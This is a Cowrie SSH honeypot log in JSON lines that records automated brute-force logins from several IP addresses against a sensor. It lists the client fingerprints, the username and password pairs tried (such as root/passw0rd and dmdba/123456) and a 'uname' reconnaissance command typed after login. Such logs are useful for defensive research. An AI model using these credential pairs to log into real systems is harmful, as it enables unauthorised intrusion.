{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:14.675320Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
{"eventid":"cowrie.login.success","username":"root","password":"passw0rd","message":"login attempt [root/passw0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:48:14.830082Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:48:14.996625Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:48:14.997439Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:15.053556Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:15.054823Z","src_ip":"212.227.125.160","session":"8d19876ed19e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58448,"dst_ip":"1.2.3.4","dst_port":22,"session":"905cbdcd04e0","protocol":"ssh","message":"New connection: 212.227.125.160:58448 (1.2.3.4:22) [session: 905cbdcd04e0]","sensor":"my-vps","timestamp":"2025-08-26T11:48:17.956161Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:18.006284Z","src_ip":"212.227.125.160","session":"905cbdcd04e0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60104,"dst_ip":"1.2.3.4","dst_port":22,"session":"8a38ffdc45bf","protocol":"ssh","message":"New connection: 212.227.125.160:60104 (1.2.3.4:22) [session: 8a38ffdc45bf]","sensor":"my-vps","timestamp":"2025-08-26T11:48:19.841976Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:19.850397Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:19.899008Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.login.success","username":"root","password":"!qaz@WSX","message":"login attempt [root/!qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.132699Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T11:48:20.265586Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.266329Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.342046Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.343151Z","src_ip":"212.227.125.160","session":"8a38ffdc45bf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41334,"dst_ip":"1.2.3.4","dst_port":22,"session":"0df7598b9d04","protocol":"ssh","message":"New connection: 83.168.105.65:41334 (1.2.3.4:22) [session: 0df7598b9d04]","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.420777Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.421934Z","src_ip":"83.168.105.65","session":"0df7598b9d04"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.457957Z","src_ip":"83.168.105.65","session":"0df7598b9d04"}
{"eventid":"cowrie.login.failed","username":"guest","password":"guest","message":"login attempt [guest/guest] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:20.569192Z","src_ip":"83.168.105.65","session":"0df7598b9d04"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:21.608160Z","src_ip":"83.168.105.65","session":"0df7598b9d04"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60876,"dst_ip":"1.2.3.4","dst_port":22,"session":"ec495abcf8b6","protocol":"ssh","message":"New connection: 212.227.125.160:60876 (1.2.3.4:22) [session: ec495abcf8b6]","sensor":"my-vps","timestamp":"2025-08-26T11:48:25.965977Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:25.966739Z","src_ip":"212.227.125.160","session":"ec495abcf8b6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:26.018486Z","src_ip":"212.227.125.160","session":"ec495abcf8b6"}
{"eventid":"cowrie.login.failed","username":"dmdba","password":"123456","message":"login attempt [dmdba/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:26.182457Z","src_ip":"212.227.125.160","session":"ec495abcf8b6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:27.235006Z","src_ip":"212.227.125.160","session":"ec495abcf8b6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":33414,"dst_ip":"1.2.3.4","dst_port":22,"session":"2548b63b99a6","protocol":"ssh","message":"New connection: 212.227.125.160:33414 (1.2.3.4:22) [session: 2548b63b99a6]","sensor":"my-vps","timestamp":"2025-08-26T11:48:31.281845Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:31.282751Z","src_ip":"212.227.125.160","session":"2548b63b99a6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:31.333380Z","src_ip":"212.227.125.160","session":"2548b63b99a6"}
{"eventid":"cowrie.login.failed","username":"cloud","password":"cloud","message":"login attempt [cloud/cloud] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:31.504896Z","src_ip":"212.227.125.160","session":"2548b63b99a6"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:32.556515Z","src_ip":"212.227.125.160","session":"2548b63b99a6"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":41454,"dst_ip":"1.2.3.4","dst_port":22,"session":"78d1460a4b54","protocol":"ssh","message":"New connection: 83.168.105.65:41454 (1.2.3.4:22) [session: 78d1460a4b54]","sensor":"my-vps","timestamp":"2025-08-26T11:48:35.869359Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:35.870319Z","src_ip":"83.168.105.65","session":"78d1460a4b54"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:35.907308Z","src_ip":"83.168.105.65","session":"78d1460a4b54"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":49618,"dst_ip":"1.2.3.4","dst_port":22,"session":"d356f1b2b5ae","protocol":"ssh","message":"New connection: 217.72.205.35:49618 (1.2.3.4:22) [session: d356f1b2b5ae]","sensor":"my-vps","timestamp":"2025-08-26T11:48:35.987884Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:35.988899Z","src_ip":"217.72.205.35","session":"d356f1b2b5ae"}
{"eventid":"cowrie.login.failed","username":"worker","password":"worker","message":"login attempt [worker/worker] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:36.017555Z","src_ip":"83.168.105.65","session":"78d1460a4b54"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:37.055879Z","src_ip":"83.168.105.65","session":"78d1460a4b54"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34184,"dst_ip":"1.2.3.4","dst_port":22,"session":"aa7ba5ca1da7","protocol":"ssh","message":"New connection: 212.227.125.160:34184 (1.2.3.4:22) [session: aa7ba5ca1da7]","sensor":"my-vps","timestamp":"2025-08-26T11:48:37.082336Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:37.083833Z","src_ip":"212.227.125.160","session":"aa7ba5ca1da7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:37.133764Z","src_ip":"212.227.125.160","session":"aa7ba5ca1da7"}
{"eventid":"cowrie.login.failed","username":"init","password":"init","message":"login attempt [init/init] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:37.307300Z","src_ip":"212.227.125.160","session":"aa7ba5ca1da7"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:38.385446Z","src_ip":"212.227.125.160","session":"aa7ba5ca1da7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34924,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f3e1caf49a4","protocol":"ssh","message":"New connection: 212.227.125.160:34924 (1.2.3.4:22) [session: 5f3e1caf49a4]","sensor":"my-vps","timestamp":"2025-08-26T11:48:42.636928Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:42.649359Z","src_ip":"212.227.125.160","session":"5f3e1caf49a4"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:48:42.803531Z","src_ip":"212.227.125.160","session":"5f3e1caf49a4"}
{"eventid":"cowrie.login.failed","username":"docubeapp-usr","password":"docubeapp-usr","message":"login attempt [docubeapp-usr/docubeapp-usr] failed","sensor":"my-vps","timestamp":"2025-08-26T11:48:43.081852Z","src_ip":"212.227.125.160","session":"5f3e1caf49a4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:48:44.140666Z","src_ip":"212.227.125.160","session":"5f3e1caf49a4"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":37690,"dst_ip":"1.2.3.4","dst_port":22,"session":"b5e0261cf46e","protocol":"ssh","message":"New connection: 196.251.86.249:37690 (1.2.3.4:22) [session: b5e0261cf46e]","sensor":"my-vps","timestamp":"2025-08-26T11:48:49.522602Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35726,"dst_ip":"1.2.3.4","dst_port":22,"session":"1ef8e9a409f7","protocol":"ssh","message":"New connection: 212.227.125.160:35726 (1.2.3.4:22) [session: 1ef8e9a409f7]","sensor":"my-vps","timestamp":"2025-08-26T11:48:49.686549Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:49.722649Z","src_ip":"212.227.125.160","session":"1ef8e9a409f7"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:48:50.169816Z","src_ip":"196.251.86.249","session":"b5e0261cf46e"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T11:48:50.171533Z","src_ip":"196.251.86.249","session":"b5e0261cf46e"}
